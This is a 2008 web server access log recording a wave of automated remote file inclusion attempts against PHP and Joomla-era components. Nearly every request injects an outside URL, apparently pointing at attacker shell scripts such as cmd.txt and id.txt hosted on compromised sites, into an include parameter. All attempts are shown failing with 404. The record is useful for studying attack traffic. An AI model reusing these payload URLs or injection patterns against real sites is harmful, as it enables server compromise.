90.156.145.60 - - [12/Jan/2008:10:12:51 -0800] "GET //index.php?pagina=http://collegejacquesprevert.ca/eleves/.plugins/id.txt??????????????????????????? HTTP/1.1" 404 269 "-" "libwww-perl/5.803" "www.projectpr.com"
90.156.145.60 - - [12/Jan/2008:10:12:51 -0800] "GET /logs//index.php?pagina=http://collegejacquesprevert.ca/eleves/.plugins/id.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
62.193.230.39 - - [12/Jan/2008:10:13:40 -0800] "GET //index.php?classified_path=http://www.netmeup.ro/components/.../test.txt????? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.projectpr.com"
62.193.230.39 - - [12/Jan/2008:10:13:40 -0800] "GET /logs//index.php?classified_path=http://www.netmeup.ro/components/.../test.txt????? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.projectpr.com"
74.6.8.120 - - [12/Jan/2008:10:18:01 -0800] "GET /logs/access.log HTTP/1.0" 200 349804 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
67.205.67.39 - - [12/Jan/2008:10:19:56 -0800] "GET /logs/access_070812.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.martina-brodska.com/administrator/components/com_slideshow1/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
65.254.58.42 - - [12/Jan/2008:10:20:09 -0800] "GET /logs/access_070712.log//tools/send_reminders.php?noSet=0&includedir=http://www.psicosalute.it/modules/xt_conteudo_copia/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
65.254.58.42 - - [12/Jan/2008:10:20:10 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.psicosalute.it/modules/xt_conteudo_copia/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
65.254.58.42 - - [12/Jan/2008:10:20:10 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.psicosalute.it/modules/xt_conteudo_copia/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
207.58.179.218 - - [12/Jan/2008:10:22:11 -0800] "GET /components/com_simpleboard/file_upload.php?sbp=http://www.geocities.com/mobileuser.13571325/CMD/cmd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
70.85.19.68 - - [12/Jan/2008:10:24:07 -0800] "GET /logs/access_070812.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
85.249.135.2 - - [12/Jan/2008:10:27:47 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://kamloopstutor.com/images/Qe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
213.239.177.121 - - [12/Jan/2008:10:28:23 -0800] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.modem56.info//modules/Downloads/screenshots/ftp.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.projectpr.com"
213.239.177.121 - - [12/Jan/2008:10:28:23 -0800] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.modem56.info//modules/Downloads/screenshots/ftp.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.projectpr.com"
72.9.145.107 - - [12/Jan/2008:10:32:11 -0800] "GET /logs/access_070612.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.9.145.107 - - [12/Jan/2008:10:32:11 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.9.145.107 - - [12/Jan/2008:10:32:11 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.9.145.107 - - [12/Jan/2008:10:33:13 -0800] "GET /logs/access_070812.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
67.15.12.20 - - [12/Jan/2008:10:33:16 -0800] "GET /logs/access_070612.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
67.15.12.20 - - [12/Jan/2008:10:33:16 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
67.15.12.20 - - [12/Jan/2008:10:33:17 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
207.58.179.218 - - [12/Jan/2008:10:33:51 -0800] "GET /logs/access.log/components/com_simpleboard/file_upload.php?sbp=http://www.geocities.com/mobileuser.13571325/CMD/cmd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
207.58.179.218 - - [12/Jan/2008:10:33:51 -0800] "GET /logs/components/com_simpleboard/file_upload.php?sbp=http://www.geocities.com/mobileuser.13571325/CMD/cmd.jpg?? HTTP/1.1" 404 293 "-" "libwww-perl/5.808" "www.projectpr.com"
85.214.68.70 - - [12/Jan/2008:10:34:20 -0800] "GET /logs/access.log//newspublish/index.php?path[docroot]=http://www.geocities.com/mayam_anay/vaksin? HTTP/1.1" 404 284 "-" "libwww-perl/5.803" "www.projectpr.com"
85.214.68.70 - - [12/Jan/2008:10:34:20 -0800] "GET /logs//newspublish/index.php?path[docroot]=http://www.geocities.com/mayam_anay/vaksin? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
67.15.12.20 - - [12/Jan/2008:10:35:52 -0800] "GET /logs/access_070812.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
72.9.145.107 - - [12/Jan/2008:10:36:51 -0800] "GET /logs/access.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 305 "-" "libwww-perl/5.808" "www.projectpr.com"
72.9.145.107 - - [12/Jan/2008:10:36:52 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.9.145.107 - - [12/Jan/2008:10:36:52 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
85.249.135.2 - - [12/Jan/2008:10:38:13 -0800] "GET /logs/access_070812.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://kamloopstutor.com/images/Qe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
85.249.135.2 - - [12/Jan/2008:10:38:13 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://kamloopstutor.com/images/Qe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
67.15.12.20 - - [12/Jan/2008:10:40:40 -0800] "GET /logs/access.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
67.15.12.20 - - [12/Jan/2008:10:40:41 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
67.15.12.20 - - [12/Jan/2008:10:40:46 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 294 "-" "libwww-perl/5.805" "www.projectpr.com"
74.6.8.120 - - [12/Jan/2008:10:46:16 -0800] "GET /logs/access_070812.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
72.9.145.107 - - [12/Jan/2008:10:47:26 -0800] "GET /logs/access_071112.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 312 "-" "libwww-perl/5.808" "www.projectpr.com"
124.32.128.178 - - [12/Jan/2008:10:53:19 -0800] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
89.111.176.32 - - [12/Jan/2008:10:54:33 -0800] "GET /logs/access.log/write.php?dir=http://www.3blindmicedesign.com/success//oneadmin/photogallery/.r/ser?? HTTP/1.1" 404 271 "-" "libwww-perl/5.805" "www.projectpr.com"
89.111.176.32 - - [12/Jan/2008:10:54:34 -0800] "GET /write.php?dir=http://www.3blindmicedesign.com/success//oneadmin/photogallery/.r/ser?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
89.111.176.32 - - [12/Jan/2008:10:54:37 -0800] "GET /logs/write.php?dir=http://www.3blindmicedesign.com/success//oneadmin/photogallery/.r/ser?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
66.249.19.17 - - [12/Jan/2008:10:54:58 -0800] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
124.32.128.178 - - [12/Jan/2008:10:57:49 -0800] "GET /logs/access_070812.log//addpost_newpoll.php?addpoll=preview&thispath=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
124.32.128.178 - - [12/Jan/2008:10:57:49 -0800] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
89.111.176.32 - - [12/Jan/2008:11:00:44 -0800] "GET /logs/access.log/claroline/auth/lostPassword.php//ldap/authldap.php?includePath=http://www.3blindmicedesign.com/success//oneadmin/photogallery/.r/ser?? HTTP/1.1" 404 312 "-" "libwww-perl/5.805" "www.projectpr.com"
89.111.176.32 - - [12/Jan/2008:11:00:44 -0800] "GET /claroline/auth/lostPassword.php//ldap/authldap.php?includePath=http://www.3blindmicedesign.com/success//oneadmin/photogallery/.r/ser?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
89.111.176.32 - - [12/Jan/2008:11:00:48 -0800] "GET /logs/claroline/auth/lostPassword.php//ldap/authldap.php?includePath=http://www.3blindmicedesign.com/success//oneadmin/photogallery/.r/ser?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
89.110.156.59 - - [12/Jan/2008:11:01:11 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://geocities.com/carneline0817/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
89.110.156.59 - - [12/Jan/2008:11:01:12 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://geocities.com/carneline0817/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
203.67.80.180 - - [12/Jan/2008:11:01:41 -0800] "GET /logs/access.log//index.php?pagina=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
203.67.80.180 - - [12/Jan/2008:11:01:41 -0800] "GET //index.php?pagina=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 269 "-" "libwww-perl/5.808" "www.projectpr.com"
203.67.80.180 - - [12/Jan/2008:11:01:41 -0800] "GET /logs//index.php?pagina=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
65.107.59.68 - - [12/Jan/2008:11:01:48 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.prevlaka.hr/components/com_user/cmd08.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
67.15.12.20 - - [12/Jan/2008:11:01:55 -0800] "GET /logs/access_071112.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 312 "-" "libwww-perl/5.805" "www.projectpr.com"
65.107.59.68 - - [12/Jan/2008:11:03:35 -0800] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.prevlaka.hr/components/com_user/cmd08.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
65.107.59.68 - - [12/Jan/2008:11:03:35 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.prevlaka.hr/components/com_user/cmd08.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
65.107.59.68 - - [12/Jan/2008:11:03:35 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.prevlaka.hr/components/com_user/cmd08.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
157.100.88.132 - - [12/Jan/2008:11:05:15 -0800] "GET /logs/access.log//index.php?pagina=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
157.100.88.132 - - [12/Jan/2008:11:05:15 -0800] "GET //index.php?pagina=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
157.100.88.132 - - [12/Jan/2008:11:05:15 -0800] "GET /logs//index.php?pagina=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 274 "-" "libwww-perl/5.805" "www.projectpr.com"
66.249.19.17 - - [12/Jan/2008:11:06:18 -0800] "GET /logs/access_070812.log//addpost_newpoll.php?addpoll=preview&thispath=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
66.249.19.17 - - [12/Jan/2008:11:06:20 -0800] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
207.44.188.10 - - [12/Jan/2008:11:07:46 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.projectpr.com"
207.44.188.10 - - [12/Jan/2008:11:07:46 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.projectpr.com"
69.93.83.98 - - [12/Jan/2008:11:08:06 -0800] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.mee.chu.edu.tw/images/red.gif????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.projectpr.com"
69.93.83.98 - - [12/Jan/2008:11:08:06 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.mee.chu.edu.tw/images/red.gif????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.projectpr.com"
69.93.83.98 - - [12/Jan/2008:11:08:06 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.mee.chu.edu.tw/images/red.gif????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.projectpr.com"
85.249.135.2 - - [12/Jan/2008:11:09:51 -0800] "GET /logs/access.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://kamloopstutor.com/images/Qe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
194.213.194.42 - - [12/Jan/2008:11:10:03 -0800] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.huerzeler-reisen.ch/cache/stats.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
194.213.194.42 - - [12/Jan/2008:11:10:04 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.huerzeler-reisen.ch/cache/stats.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
194.213.194.42 - - [12/Jan/2008:11:10:04 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.huerzeler-reisen.ch/cache/stats.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
65.107.59.68 - - [12/Jan/2008:11:11:42 -0800] "GET /logs/access_070812.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.prevlaka.hr/components/com_user/cmd08.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
85.234.144.91 - - [12/Jan/2008:11:16:53 -0800] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
85.234.144.91 - - [12/Jan/2008:11:16:53 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
85.234.144.91 - - [12/Jan/2008:11:16:54 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
88.131.106.15 - - [12/Jan/2008:11:17:03 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.projectpr.com"
88.131.106.15 - - [12/Jan/2008:11:17:04 -0800] "GET /aboutus.html HTTP/1.0" 200 13748 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.projectpr.com"
58.103.130.64 - - [12/Jan/2008:11:19:55 -0800] "GET /logs/access.log//index.php?pagina=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 272 "-" "libwww-perl/5.79" "www.projectpr.com"
58.103.130.64 - - [12/Jan/2008:11:19:55 -0800] "GET //index.php?pagina=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
58.103.130.64 - - [12/Jan/2008:11:19:56 -0800] "GET /logs//index.php?pagina=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
74.52.170.162 - - [12/Jan/2008:11:21:50 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
67.19.3.34 - - [12/Jan/2008:11:21:52 -0800] "GET /logs/access.log///advguestbook/admin.php?include_path=http://www.fastmodding.com//shop/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
67.19.3.34 - - [12/Jan/2008:11:21:52 -0800] "GET ///advguestbook/admin.php?include_path=http://www.fastmodding.com//shop/images/djd.txt??? HTTP/1.1" 404 270 "-" "libwww-perl/5.808" "www.projectpr.com"
67.19.3.34 - - [12/Jan/2008:11:21:52 -0800] "GET /logs///advguestbook/admin.php?include_path=http://www.fastmodding.com//shop/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
89.96.224.38 - - [12/Jan/2008:11:22:07 -0800] "GET /logs/access.log///advguestbook/admin.php?include_path=http://charitygrants.org/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
89.96.224.38 - - [12/Jan/2008:11:22:08 -0800] "GET ///advguestbook/admin.php?include_path=http://charitygrants.org/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
89.96.224.38 - - [12/Jan/2008:11:22:08 -0800] "GET /logs///advguestbook/admin.php?include_path=http://charitygrants.org/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
195.62.20.5 - - [12/Jan/2008:11:23:32 -0800] "GET /logs/access_%3Cwbr%20/%3E071112.log//components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.geocities.com/dor_boom/djd.txt??? HTTP/1.1" 404 322 "-" "libwww-perl/5.803" "www.projectpr.com"
195.62.20.5 - - [12/Jan/2008:11:23:32 -0800] "GET //components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.geocities.com/dor_boom/djd.txt??? HTTP/1.1" 404 286 "-" "libwww-perl/5.803" "www.projectpr.com"
195.62.20.5 - - [12/Jan/2008:11:23:33 -0800] "GET /logs/access_%3Cwbr%20//components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.geocities.com/dor_boom/djd.txt??? HTTP/1.1" 404 307 "-" "libwww-perl/5.803" "www.projectpr.com"
69.93.83.98 - - [12/Jan/2008:11:23:47 -0800] "GET /logs/access_071112.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.mee.chu.edu.tw/images/red.gif????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.projectpr.com"
194.213.194.42 - - [12/Jan/2008:11:24:10 -0800] "GET /logs/access_070712.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.huerzeler-reisen.ch/cache/stats.txt?? HTTP/1.1" 404 310 "-" "libwww-perl/5.805" "www.projectpr.com"
58.74.175.5 - - [12/Jan/2008:11:25:11 -0800] "GET /logs/access.log//index.php?pagina=http://collegejacquesprevert.ca/eleves/.plugins/id.txt??????????????????????????? HTTP/1.1" 404 272 "-" "libwww-perl/5.79" "www.projectpr.com"
58.74.175.5 - - [12/Jan/2008:11:25:12 -0800] "GET //index.php?pagina=http://collegejacquesprevert.ca/eleves/.plugins/id.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
58.74.175.5 - - [12/Jan/2008:11:25:12 -0800] "GET /logs//index.php?pagina=http://collegejacquesprevert.ca/eleves/.plugins/id.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
74.52.170.162 - - [12/Jan/2008:11:27:12 -0800] "GET /logs/access_070612.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
74.52.170.162 - - [12/Jan/2008:11:27:12 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
74.52.170.162 - - [12/Jan/2008:11:29:02 -0800] "GET /logs/access_070812.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
88.131.106.15 - - [12/Jan/2008:11:29:30 -0800] "GET /services.html HTTP/1.0" 200 9658 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.projectpr.com"
81.169.157.91 - - [12/Jan/2008:11:32:20 -0800] "GET /logs/access_070812.log/modules/vwar/admin/admin.php?vwar_root=http://www.sboard.de/uploads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.projectpr.com"
81.169.157.91 - - [12/Jan/2008:11:32:20 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.sboard.de/uploads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.projectpr.com"
81.169.157.91 - - [12/Jan/2008:11:32:21 -0800] "GET /logs/modules/vwar/admin/admin.php?vwar_root=http://www.sboard.de/uploads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.projectpr.com"
74.52.170.162 - - [12/Jan/2008:11:34:53 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
208.122.223.146 - - [12/Jan/2008:11:37:25 -0800] "GET /logs/access.log/components/com_simpleboard/image_upload.php?sbp=http://www.skd.it/vwar/admin/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
208.122.223.146 - - [12/Jan/2008:11:37:25 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.skd.it/vwar/admin/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
208.122.223.146 - - [12/Jan/2008:11:37:25 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.skd.it/vwar/admin/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
85.119.157.176 - - [12/Jan/2008:11:39:01 -0800] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.geocities.com/dor_boom/djd.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.projectpr.com"
85.119.157.176 - - [12/Jan/2008:11:39:01 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.geocities.com/dor_boom/djd.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.projectpr.com"
85.119.157.176 - - [12/Jan/2008:11:39:01 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.geocities.com/dor_boom/djd.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.projectpr.com"
213.189.224.45 - - [12/Jan/2008:11:42:05 -0800] "GET /logs/access.log//login.php?dir=http://www.gruppomulti.ch/documents/coges.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
213.189.224.45 - - [12/Jan/2008:11:42:06 -0800] "GET //login.php?dir=http://www.gruppomulti.ch/documents/coges.txt? HTTP/1.1" 404 269 "-" "libwww-perl/5.808" "www.projectpr.com"
213.189.224.45 - - [12/Jan/2008:11:42:06 -0800] "GET /logs//login.php?dir=http://www.gruppomulti.ch/documents/coges.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
195.62.20.5 - - [12/Jan/2008:11:43:01 -0800] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.geocities.com/dor_boom/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
195.62.20.5 - - [12/Jan/2008:11:43:01 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.geocities.com/dor_boom/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
195.62.20.5 - - [12/Jan/2008:11:43:02 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.geocities.com/dor_boom/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
87.118.114.21 - - [12/Jan/2008:11:43:37 -0800] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
